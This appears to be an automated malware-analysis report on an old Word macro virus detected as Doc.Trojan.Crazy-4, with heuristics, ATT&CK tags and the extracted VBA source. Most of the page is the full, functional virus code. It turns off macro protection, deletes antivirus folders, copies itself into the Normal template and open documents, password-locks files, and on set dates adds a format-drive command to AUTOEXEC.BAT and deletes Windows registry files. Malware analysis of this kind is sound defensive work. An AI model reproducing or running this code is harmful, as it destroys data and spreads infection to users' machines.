MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros designed to disable macro security and delete menu items related to macro management. The AutoOpen macro attempts to delete security-related menu items and then calls AutoClose, which tries to infect the Normal template and the active document with the 'Crazy' macro. It also attempts to delete files from common antivirus installation directories. The presence of legacy WordBasic markers and the specific macro names suggest an older, but still functional, malicious document.
Heuristics 5
-
ClamAV: Doc.Trojan.Crazy-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Crazy-4
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11381 bytes |
SHA-256: b7f44b4fb97b3f6c8199d4224a10e7bed0de73914f03b30502d4fa9de1c25945 |
|||
|
Detection
ClamAV:
Doc.Trojan.Crazy-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Crazy"
Sub AutoOpen()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo Crazy
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
WordBasic.FileSummaryInfo Author:="Crazy by ULTRAS"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Program Files\McAfee\VirusScan\*.*"
Kill "C:\Program Files\Norton AntiVirus\*.*"
Kill "C:\VDOC\*.*"
Call AutoClose
Call Crazy
Crazy:
End Sub
Sub AutoClose()
On Error GoTo Crazy
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.UserName = "ULTRAS"
Application.UserInitials = "Crazy"
Set GlobalDoc = NormalTemplate
Set ActiveDoc = ActiveDocument
GlobalInfect = No
DocumentInfect = No
For u = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(u).Name = "Crazy" Then
GlobalInfect = Yes
End If
Next
For w = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(w).Name = "Crazy" Then
DocumentInfect = Yes
End If
Next
If GlobalInfect = No Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Crazy", Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
If DocumentInfect = No Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Crazy", Object:=wdOrganizerObjectProjectItems
ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
End If
Application.DisplayAlerts = wdAlertsAll
Call Crazy
Crazy:
End Sub
Sub FileSave()
On Error GoTo Crazy
ActiveDocument.Password = "ULTRAS"
ActiveDocument.Save
Crazy:
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
On Error GoTo Crazy
Set ULTRAS = ActiveDocument.Range(Start:=0, End:=0)
With ULTRAS
.InsertBefore "CRAZY BY ULTRAS"
.Font.Size = 50
.Font.Name = "Impact"
.Font.ColorIndex = 3
.Font.Shadow = 1
.Font.Animation = 2
End With
Crazy:
End Sub
Sub Crazy()
On Error GoTo Crazy
If Day(Now()) = 5 Then
MsgBox "You Infected WM97.Crazy by ULTRAS", vbCritical + vbOKOnly, "ULTRAS"
ActiveDocument.Password = "Crazy"
ActiveDocument.Save
End If
If Day(Now()) = 19 Then
Open "C:\AUTOEXEC.BAT" For Input As #1
Close
SetAttr "C:\AUTOEXEC.BAT", vbNormal
Open "C:\AUTOEXEC.BAT" For Append As #1
Print #1, "@ECHO OFF"
Print #1, "CLS"
Print #1, "ECHO Please wait..."
Print #1, "FORMAT C: /U /C /S /AUTOTEST > NUL"
Close #1
SetAttr "C:\AUTOEXEC.BAT", vbReadOnly
End If
If Day(Now()) = 27 Then
MsgBox "You Infected WM97.Crazy by ULTRAS", vbCritical + vbOKOnly, "ULTRAS"
SetAttr "C:\Windows\user.da0", 0
Kill "C:\Windows\user.da0"
SetAttr "C:\Windows\system.da0", 0
Kill "C:\Windows\system.da0"
SetAttr "C:\Windows\user.dat", 0
Kill "C:\Windows\user.dat"
SetAttr "C:\Windows\system.dat", 0
Kill "C:\Windows\system.dat"
End If
Crazy:
End Sub
' Processing file: /opt/analyzer/scan_staging/dac08855b9624e7da0d33e1d9637f68a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Crazy - 6139 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #2:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #3:
' OnError Crazy
' Line #4:
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #5:
' LitStr 0x000C "Customize..."
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall D
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.